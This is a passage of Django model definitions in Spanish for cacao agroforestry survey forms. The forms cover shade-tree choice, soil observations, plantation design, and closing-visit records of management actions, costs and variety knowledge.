('G', 'Que es fácil para podar '),
)
CHOICE_SAF_1_6_FRUTALES = (
('A', 'Que produce buenos elementos '),
('B', 'Que ayuda a manejar el daño de pájaros y ardillas'),
('C', 'Que tenga resistencia a plagas '),
    ('D', 'Que tenga una sombra no muy densa'),
('E', 'Que tenga valor comercial'),
('F', 'Que es fácil para manejar'),
)
CHOICE_SAF_1_6_SERVICIOS = (
('A', 'Que produce más y mejor hojarasca '),
('B', 'Que las hojas dan nutrientes'),
('C', 'Que no compiten con cacao'),
('D', 'Que dan buena sombra'),
('E', 'Que tienen hojas todo el tiempo'),
('F', 'Que producen leña'),
('G', 'Que tenga uso medicinal'),
('H', 'Que adapte bien en la zona '),
)
class SafConversacion6(models.Model):
conversacion9 = MultiSelectField(choices=CHOICE_SAF_1_6_MADERABLE,
verbose_name='Para escoger a los árboles maderable ')
conversacion10 = MultiSelectField(choices=CHOICE_SAF_1_6_FRUTALES,
verbose_name='Para escoger a los árboles frutales')
conversacion11 = MultiSelectField(choices=CHOICE_SAF_1_6_SERVICIOS,
verbose_name='Para escoger a los árboles que proveen servicios')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"¿Cuáles son sus criterio para escoger los árboles para acompañar el cacao?"
CHOICE_SAF_1_6_ETAPA = (
(1, 'Crecimiento vegetativo'),
(2, 'Floración'),
(3, 'Cuajado y maduración'),
(4, 'Cosecha'),
)
CHOICE_SAF_1_6_NIVEL_SOMBRA = (
(1, 'Sin sombra'),
(2, 'Poca Sombra'),
(3, 'Media sombra'),
(4, 'Mucha sombra'),
)
class SafConversacion7(models.Model):
conversacion12 = models.IntegerField(choices=CHOICE_SAF_1_6_ETAPA,
verbose_name='Etapas')
conversacion13 = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='Meses que ocurren')
conversacion14 = models.IntegerField(choices=CHOICE_SAF_1_6_NIVEL_SOMBRA,
verbose_name='Nivel de sombra')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.6¿Cómo quisiera tener la sombra en diferentes momentos de vida de cacao?"
CHOICE_SAF_1_7_PROBLEMAS = (
(1, 'Poca floración'),
(2, 'Presencia de malezas'),
(3, 'Presencia de Monilia'),
(4, 'Presencia de mazorca negra'),
(5, 'Baja producción'),
(6, 'Daño de ardillas'),
)
CHOICE_SAF_1_7_CAUSA_PROBLEMAS = (
(1, 'Poca Sombra'),
(2, 'Mucha Sombra'),
)
class SafConversacion8(models.Model):
conversacion15 = models.IntegerField(choices=CHOICE_SAF_1_7_PROBLEMAS,
verbose_name='Problemas')
conversacion16 = models.IntegerField(choices=CHOICE_SAF_1_7_CAUSA_PROBLEMAS,
verbose_name='Que causa el problema')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.7¿Cuál es la percepción de los problemas en relación a la sombra?"
CHOICE_SAF_1_8 = (
(1, 'De propia finca'),
(2, 'De propia finca árboles élites'),
(3, 'De finca vecina'),
(4, 'De jardines clónales'),
(5, 'De afuera del territorio '),
)
CHOICE_SAF_1_9 = (
('A', 'Cacao criollo'),
('B', 'Cacao forastero'),
('C', 'Cacao Trinitario'),
('D', 'Cacao híbrido'),
('E', 'Clones de cacao'),
('F', 'No sabe'),
)
CHOICE_SAF_1_10 = (
('A', 'Cacao criollo'),
('B', 'Cacao forastero'),
('C', 'Cacao Trinitario'),
('D', 'Cacao híbrido'),
('E', 'Clones de cacao'),
('F', 'Cacao rojo'),
('G', 'No sabe'),
)
CHOICE_SAF_1_11 = (
('A', 'Cacao criollo'),
('B', 'Cacao forastero'),
('C', 'Cacao Trinitario'),
('D', 'Cacao híbrido'),
('E', 'Clones de cacao'),
('F', 'Cacao rojo'),
('G', 'No sabe'),
)
class SafConversacion9(models.Model):
conversacion17 = models.IntegerField(choices=CHOICE_SAF_1_8,
verbose_name='1.8¿De dónde obtuvo la semilla para establecer la plantación de cacao? ')
conversacion18 = MultiSelectField(choices=CHOICE_SAF_1_9,
verbose_name='1.9¿Con que tipo de cacao se estableció la plantación de cacao? ')
conversacion19 = MultiSelectField(choices=CHOICE_SAF_1_10,
verbose_name='1.10¿Cuáles son las variedades de cacao tolerantes a las enfermedades? ')
conversacion20 = MultiSelectField(choices=CHOICE_SAF_1_11,
verbose_name='1.11¿Qué tipo de variedades le han recomendado para resiembra y en nuevas plantaciones de cacao? ')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"18,19,20"
CHOICE_SAF_2_TEMA1 = (
(1, 'Cantidad de lombrices/250 cm2'),
)
CHOICE_SAF_2_TEMA2 = (
(1, 'Grado de efervescencia con prueba de Agua Oxigenada'),
)
CHOICE_SAF_2_OPCIONES = (
(1, 'Baja'),
(2, 'Media'),
(3, 'Alta'),
)
class SafObservaciones(models.Model):
observacion1 = models.IntegerField(choices=CHOICE_SAF_2_TEMA1,
verbose_name='Tema')
observacion2 = models.FloatField('Punto 1')
observacion3 = models.FloatField('Punto 2')
observacion4 = models.FloatField('Punto 3')
observacion5 = models.FloatField('Punto 4')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Calidad de vida de suelo 1"
class SafObservaciones2(models.Model):
observacion1 = models.IntegerField(choices=CHOICE_SAF_2_TEMA2,
verbose_name='Tema')
observacion2 = models.IntegerField(choices=CHOICE_SAF_2_OPCIONES,
verbose_name='Punto 1')
observacion3 = models.IntegerField(choices=CHOICE_SAF_2_OPCIONES,
verbose_name='Punto 2')
observacion4 = models.IntegerField(choices=CHOICE_SAF_2_OPCIONES,
verbose_name='Punto 3')
observacion5 = models.IntegerField(choices=CHOICE_SAF_2_OPCIONES,
verbose_name='Punto 4')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Calidad de vida de suelo 2"
CHOICE_SAF_OBSERVACION_2_2 = (
(1, 'Bueno y apto para cacao'),
(2, 'Regular necesita enmienda para mejorar'),
(3, 'Malo y no apto para Cacao'),
    (4, 'Degradado y compacto no apto para cacao'),
)
CHOICE_SAF_OBSERVACION_2_3 = (
('A', 'Promover o sembrar cobertura'),
('B', 'Sembrar árboles que provee buena hojarasca'),
('C', 'Utilizar materiales de poda de sombra y cacao'),
('D', 'Utilizar materiales de banano'),
('E', 'Utilizar abono verde'),
('F', 'Utilizar abono orgánico'),
)
class SafObservaciones3(models.Model):
observacion6 = models.IntegerField(choices=CHOICE_SAF_OBSERVACION_2_2,
verbose_name='2.2Según lo observado en las pruebas de suelo cómo valora es estado de suelo')
observacion7 = MultiSelectField(choices=CHOICE_SAF_OBSERVACION_2_3,
verbose_name='2.3¿Qué prácticas se pueden hacer en el suelo de su parcela de aprendizaje para mejorar el la vida de suelo?')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Observacion 2.2 y 2.3"
class SafObservacionPunto1(models.Model):
especies = models.ForeignKey(Especies)
cantidad = models.FloatField()
lena = models.FloatField('Para leña')
nutrientes = models.FloatField('Para nutrientes')
frutas = models.FloatField('Para Frutas')
madera = models.FloatField('Para Madera')
sombra = models.FloatField('Para sombra')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Punto 1"
class SafObservacionPunto2(models.Model):
especies = models.ForeignKey(Especies)
cantidad = models.FloatField()
lena = models.FloatField('Para leña')
nutrientes = models.FloatField('Para nutrientes')
frutas = models.FloatField('Para Frutas')
madera = models.FloatField('Para Madera')
sombra = models.FloatField('Para sombra')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Punto 2"
class SafObservacionPunto3(models.Model):
especies = models.ForeignKey(Especies)
cantidad = models.FloatField()
lena = models.FloatField('Para leña')
nutrientes = models.FloatField('Para nutrientes')
frutas = models.FloatField('Para Frutas')
madera = models.FloatField('Para Madera')
sombra = models.FloatField('Para sombra')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Punto 3"
CHOICE_SAF_OBSERVACION_2_5 = (
(1, 'Cuadrado'),
(2, 'Rectangular'),
(3, 'Tres bolillos'),
(4, 'Sin arreglo')
)
CHOICE_SAF_OBSERVACION_2_6 = (
(1, 'Demasiado árboles y mucha sombra'),
    (2, 'Muy pocos árboles y poca sombra'),
(3, 'Plantas de cacao y otros árboles compiten'),
(4, 'No hay problema y arreglo esta bien')
)
CHOICE_SAF_OBSERVACION_2_7 = (
(1, 'Cacao + maderable + musáceas + pejibaye'),
(2, 'Cacao + musáceas + cultivos anuales'),
(3, 'Cacao + maderables + musáceas'),
(4, 'Cacao + musáceas + leguminosa + maderables'),
(5, 'Cacao + musáceas + leguminosa + maderables+ frutales'),
)
CHOICE_SAF_OBSERVACION_2_8 = (
('A', 'Mejorar la producción de cacao'),
('B', 'Diversificar la producción e ingreso'),
('C', 'Producir más alimento'),
('D', 'Producir leña'),
('E', 'Producir madera'),
('F', 'Mejorar la conservación de Recursos naturales'),
)
class SafObservaciones4(models.Model):
observacion8 = models.IntegerField(choices=CHOICE_SAF_OBSERVACION_2_5,
verbose_name='2.5 ¿Cómo es el arreglo de la plantación?')
observacion9 = models.IntegerField(choices=CHOICE_SAF_OBSERVACION_2_6,
verbose_name='2.6 ¿Qué dificultades le ha generado su diseño actual de plantación de cacao?')
observacion10 = models.IntegerField(choices=CHOICE_SAF_OBSERVACION_2_7,
verbose_name='2.7 ¿Cuál sería el diseño para mejorar el sistema agroforestal cacao? ')
observacion11 = MultiSelectField(choices=CHOICE_SAF_OBSERVACION_2_8,
verbose_name='2.8 ¿Por qué toma la decisión de establecer el diseño seleccionado?')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Observacion 2.5 al 2.8"
#--------------------- end of saf form -----------
#---------------------- cierre (closing) form -----------
class FichaCierre(models.Model):
productor = models.ForeignKey(
Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_cierre')
tecnico = models.ForeignKey(
Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_cierre')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha cierre"
verbose_name_plural = "Ficha cierre"
CHOICE_CIERRE_1_1_IMPACTO = (
('A', 'Tipo de árboles y cantidad'),
('B', 'Mucha sombra de los árboles'),
('C', 'Poca sombra de los árboles'),
('D', 'Efecto de sombra sobre las plagas y enfermedades'),
('E', 'Efecto de sombra sobre la producción'),
('F', 'Ninguna'),
)
CHOICE_CIERRE_1_1_PLANIFICADA = (
('A', 'Regulación de sombra'),
('B', 'Eliminación de árboles'),
('C', 'Sembrar árboles'),
('D', 'Eliminar musaceas'),
('E', 'Sembrar musaceas y sombra temporal'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_1_REALIZADA = (
('A', 'Regulación de sombra'),
('B', 'Eliminación de árboles'),
('C', 'Sembrar árboles'),
('D', 'Eliminar musaceas'),
('E', 'Sembrar musaceas y sombra temporal'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_1_RESULTADOS = (
('A', 'Aumento de producción'),
('B', 'Mejor control de malas hierbas'),
('C', 'Reducción de enfermedades'),
('D', 'Eliminar musaceas'),
('E', 'Ninguna'),
)
class CierreManejo1(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_1_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_1_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_1_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_1_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.1"
class Meta:
verbose_name='1.1 Sombra'
verbose_name_plural='1.1 Sombra'
CHOICE_CIERRE_1_2_IMPACTO = (
('A', 'Altura y ancho de plantas de cacao'),
('B', 'Falta de horquetas'),
('C', 'Muchas ramas bajeras y entrecruzadas'),
('D', 'Poca penetración de luz'),
('E', 'Relación entre poda y productividad'),
('F', 'Ninguna'),
)
CHOICE_CIERRE_1_2_PLANIFICADA = (
('A', 'Descope de las plantas'),
('B', 'Poda de las ramas entrecruzadas'),
('C', 'Eliminar los chupones'),
('D', 'Formar horquetas'),
('E', 'Eliminar ramas bajeras'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_2_REALIZADA = (
('A', 'Descope de las plantas'),
('B', 'Poda de las ramas entrecruzadas'),
('C', 'Eliminar los chupones'),
('D', 'Formar horquetas'),
('E', 'Eliminar ramas bajeras'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_2_RESULTADOS = (
('A', 'Aumento de producción'),
('B', 'Mejor entrada de luz'),
('C', 'Reducción de enfermedades'),
('D', 'Ninguna'),
)
class CierreManejo2(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_2_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_2_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_2_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_2_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.2"
class Meta:
verbose_name='1.2 Poda'
verbose_name_plural='1.2 Poda'
CHOICE_CIERRE_1_3_IMPACTO = (
('A', 'Falta de obra de conservación'),
('B', 'Falta de obra de drenaje'),
('C', 'Deficiencia o desbalance de nutrientes'),
('D', 'Estado de fertilidad de suelo'),
('E', 'Relación entre suelo, fertilidad y la productividad'),
('F', 'Ninguna'),
)
CHOICE_CIERRE_1_3_PLANIFICADA = (
('A', 'Aplicar abono orgánicos'),
('B', 'Aplicar abono mineral'),
('C', 'Aplicar Cal o Ceniza'),
('D', 'Abonar según datos de análisis'),
('E', 'Sembrar abono verde y cobertura'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_3_REALIZADA = (
('A', 'Aplicar abono orgánicos'),
('B', 'Aplicar abono mineral'),
('C', 'Aplicar Cal o Ceniza'),
('D', 'Abonar según datos de análisis'),
('E', 'Sembrar abono verde y cobertura'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_3_RESULTADOS = (
('A', 'Aumento de producción'),
('B', 'Aumento de la floración'),
('C', 'Reducción de enfermedades'),
('D', 'Abonar según datos de análisis'),
('E', 'Ninguna'),
)
class CierreManejo3(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_3_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_3_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_3_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_3_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.3"
class Meta:
verbose_name='1.3 Suelo'
verbose_name_plural='1.3 Suelo'
CHOICE_CIERRE_1_4_IMPACTO = (
('A', 'Variedad de plagas y enfermedades'),
('B', 'Nivel de daño de plagas y enfermedades'),
('C', 'Relación entre poda , plagas y enfermedades'),
('D', 'Relación entre sombra y plagas y enfermedades'),
('E', 'Impacto de plagas y enfermedades sobre producción'),
('F', 'Ninguna'),
)
CHOICE_CIERRE_1_4_PLANIFICADA = (
('A', 'Realizar recuentos'),
('B', 'Mejorar la sombra'),
('C', 'Mejorar la poda'),
('D', 'Eliminar mazorcas enfermas'),
('E', 'Aplicar caldo sulfo-calcico'),
('F', 'Aplicar bio-fermentados'),
('G', 'Ninguna'),
('H', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_4_REALIZADA = (
('A', 'Realizar recuentos'),
('B', 'Mejorar la sombra'),
('C', 'Mejorar la poda'),
('D', 'Eliminar mazorcas enfermas'),
('E', 'Aplicar caldo sulfo-calcico'),
('F', 'Aplicar bio-fermentados'),
('G', 'Ninguna'),
('H', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_4_RESULTADOS = (
('A', 'Aumento de producción'),
('B', 'Reducción de daño de plagas'),
('C', 'Reducción de enfermedades'),
('D', 'Ninguna'),
)
class CierreManejo4(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_4_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_4_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_4_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_4_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.4"
class Meta:
verbose_name='1.4 Plaga'
verbose_name_plural='1.4 Plaga'
CHOICE_CIERRE_1_5_IMPACTO = (
('A', 'Variedad de mala hierbas'),
('B', 'Nivel de daño de mala hierbas'),
('C', 'Relación entre chapoda y composición del piso'),
('D', 'Relación entre herbicidas y composición del piso'),
('E', 'Cantidad de bejucos en el piso y plantas'),
('F', 'Ninguna'),
    ('G', 'Falta de materia orgánica'),
)
CHOICE_CIERRE_1_5_PLANIFICADA = (
('A', 'Realizar conteo'),
('B', 'Mejorar la sombra'),
('C', 'Eliminar bejucos'),
('D', 'Eliminar tanda'),
('E', 'Realizar manejo selectivo'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
('H', 'Repartir hojarasca'),
)
CHOICE_CIERRE_1_5_REALIZADA = (
('A', 'Realizar conteo'),
('B', 'Mejorar la sombra'),
('C', 'Eliminar bejucos'),
('D', 'Eliminar tanda'),
('E', 'Realizar manejo selectivo'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
('H', 'Repartir hojarasca'),
)
CHOICE_CIERRE_1_5_RESULTADOS = (
('A', 'Aumento de producción'),
('B', 'Reducción de malas hierbas dañinas'),
('C', 'Aumento de cobertura'),
('D', 'Eliminar tanda'),
('E', 'Ninguna'),
)
class CierreManejo5(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_5_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_5_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_5_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_5_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.5"
class Meta:
verbose_name='1.5 Piso'
verbose_name_plural='1.5 Piso'
CHOICE_CIERRE_1_6_IMPACTO = (
('A', 'Tipo de cacao que estamos sembrando'),
('B', 'Auto-incompatibilidad de las semillas'),
('C', 'La calidad de semillas'),
('D', 'Incidencia de plagas y enfermedades en vivero'),
('E', 'Calidad de plantas'),
('F', 'Ninguna'),
)
CHOICE_CIERRE_1_6_PLANIFICADA = (
('A', 'Seleccionar mazorcas y mezclar para conseguir semilla'),
('B', 'Utilizar mejor calidad de semillas'),
('C', 'Mejorar el sustrato'),
('D', 'Mejorar el tamaño de bolsa'),
('E', 'Mejorar manejo de enfermedades y plagas'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_6_REALIZADA = (
('A', 'Seleccionar mazorcas y mezclar para conseguir semilla'),
('B', 'Utilizar mejor calidad de semillas'),
('C', 'Mejorar el sustrato'),
('D', 'Mejorar el tamaño de bolsa'),
('E', 'Mejorar manejo de enfermedades y plagas'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_6_RESULTADOS = (
('A', 'Mejor vigor de las plantas'),
('B', 'Menos daño de plagas'),
('C', 'Menos daño de enfermedades'),
('D', 'Ninguna'),
)
class CierreManejo6(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_6_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_6_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_6_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_6_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.6"
class Meta:
verbose_name='1.6 Vivero'
verbose_name_plural='1.6 Vivero'
CHOICE_CIERRE_1_7_IMPACTO = (
('A', 'Cantidad de planta productiva'),
('B', 'Numero de mazorcas sanas'),
('C', 'Numero de mazorcas dañadas'),
('D', 'Nivel de cosecha de la parcela'),
('E', 'Ninguna'),
('F', 'Efecto de sombra sobre la producción'),
('G', 'Efecto de poda sobre la producción'),
)
CHOICE_CIERRE_1_7_PLANIFICADA = (
('A', 'Mejorar la poda y sombra'),
('B', 'Mejorar la fertilización'),
('C', 'Mejorar manejo de plagas'),
    ('D', 'Eliminar plantas poco productivas'),
('E', 'Sembrar plantas más productivas'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_7_REALIZADA = (
('A', 'Mejorar la poda y sombra'),
('B', 'Mejorar la fertilización'),
('C', 'Mejorar manejo de plagas'),
    ('D', 'Eliminar plantas poco productivas'),
('E', 'Sembrar plantas más productivas'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_7_RESULTADO = (
('A', 'Aumento de la cosecha'),
('B', 'Aumento de plantas productivas'),
('C', 'Mejor calidad de mazorcas'),
('D', 'Mejor calidad de granos'),
('E', 'Ninguna'),
)
class CierreManejo7(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_7_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_7_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_7_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_7_RESULTADO,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.7"
class Meta:
verbose_name='1.7 Cosecha'
verbose_name_plural='1.7 Cosecha'
CHOICE_CIERRE_COSTO_1 = (
('A', 'Cacao Criollo'),
('B', 'Cacao Trinitario'),
('C', 'Cacao Forastero'),
('D', 'Cacao híbrido'),
('E', 'Clones de cacao'),
)
class CierreCosto1(models.Model):
costo = models.FloatField('Costo de mano de obra C$/día')
area = models.FloatField('Área de parcela de cacao en mz')
tipo = MultiSelectField(choices=CHOICE_CIERRE_COSTO_1,
verbose_name='Tipo de Cacao ')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"2"
class ActividadesCierre(models.Model):
nombre = models.CharField(max_length=250)
def __unicode__(self):
return self.nombre
class Meta:
verbose_name_plural='Actividades de cierre'
class CierreActividad(models.Model):
actividad = models.ForeignKey(ActividadesCierre)
meses = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='En qué meses realizan')
familiar = models.FloatField('Uso de DP familiar')
contratada = models.FloatField('Uso de DP contratada')
insumo = models.CharField('Uso Insumo', max_length=250)
costo = models.FloatField('Costo de insumo en C$')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"2.1"
class CierreBabaRoja(models.Model):
campo1 = models.FloatField('Cosecha anual qq baba', null=True, blank=True)
campo2 = models.FloatField('Venta qq baba', null=True, blank=True)
campo3 = models.FloatField('Precio de venta qq baba', null=True, blank=True)
campo4 = models.FloatField('Cosecha anual qq grano rojo', null=True, blank=True)
campo5 = models.FloatField('Venta qq grano rojo', null=True, blank=True)
campo6 = models.FloatField('Precio de venta qq grano rojo', null=True, blank=True)
campo7 = models.FloatField('Consumo anual qq grano rojo', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"2.2"
class Meta:
verbose_name='Datos'
verbose_name_plural='Datos'
class ManejosCierre(models.Model):
nombre = models.CharField(max_length=250)
def __unicode__(self):
return self.nombre
class Meta:
verbose_name_plural='Manejos de cierre'
class CierreManejo(models.Model):
manejo = models.ForeignKey(ManejosCierre)
reposo = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
crecimiento = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
floracion = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
cosecha = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"3"
CHOICE_CIERRE_CONOCIMIENTO_TEMA1 = ((1, 'Variedad más común en mi finca'),)
class CierreConocimiento1(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_CONOCIMIENTO_TEMA1)
criollas = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
forastero = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
trinitaria = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
hibridos = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
clones = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 tema 1"
CHOICE_CIERRE_CONOCIMIENTO_TEMA2 = ((1, 'Ventajas de variedades'),)
CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS = (
('A', 'Produce más'),
('B', 'Granos grandes'),
('C', 'Tolerante a plagas y enfermedades'),
('D', 'Tiene buena estructura'),
('E', 'No necesita mucho abono'),
('F', 'No aplica'),
)
class CierreConocimiento2(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_CONOCIMIENTO_TEMA2)
criollas = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS)
forastero = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS)
trinitaria = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS)
hibridos = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS)
clones = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 tema 2"
CHOICE_CIERRE_CONOCIMIENTO_TEMA3 = ((1, 'Desventajas de variedades'),)
CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3 = (
('A', 'Produce poco'),
('B', 'Granos menudos'),
('C', 'Susceptible a plagas y enfermedades'),
('D', 'No tiene buena estructura'),
('E', 'Necesita mucho abono'),
('F', 'No aplica'),
)
class CierreConocimiento3(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_CONOCIMIENTO_TEMA3)
criollas = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3)
forastero = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3)
trinitaria = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3)
hibridos = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3)
clones = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 tema 3"
CHOICE_CIERRE_SUELO_TEMA1 = ((1, 'Que elementos aportan'),)
CHOICE_CIERRE_SUELO_RESPUESTAS1 = (
('A', 'Nitrógeno'),
('B', 'Fósforo'),
('C', 'Potasio'),
('D', 'Calcio'),
('E', 'Magnesio'),
('F', 'No aplica'),
)
class CierreSuelo1(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_SUELO_TEMA1)
abono = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS1,
verbose_name='Abono verde y coberturas')
hojarasca = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS1,
verbose_name='Hojarasca de los árboles')
organico = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS1,
verbose_name='Abono orgánico')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .2 tema 1"
CHOICE_CIERRE_SUELO_TEMA2 = ((1, 'Ventajas de esta práctica'),)
CHOICE_CIERRE_SUELO_RESPUESTAS2 = (
('A', 'Fácil de implementar'),
('B', 'De bajo costo'),
('C', 'No necesita mucha inversión'),
('D', 'No necesita mucha mano de obra'),
('E', 'Aporta al desarrollo de las plantas'),
('F', 'No aplica'),
)
class CierreSuelo2(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_SUELO_TEMA2)
abono = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS2,
verbose_name='Abono verde y coberturas')
hojarasca = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS2,
verbose_name='Hojarasca de los árboles')
organico = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS2,
verbose_name='Abono orgánico')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .2 tema 2"
CHOICE_CIERRE_SUELO_TEMA3 = ((1, 'Desventajas de esta práctica'),)
CHOICE_CIERRE_SUELO_RESPUESTAS3 = (
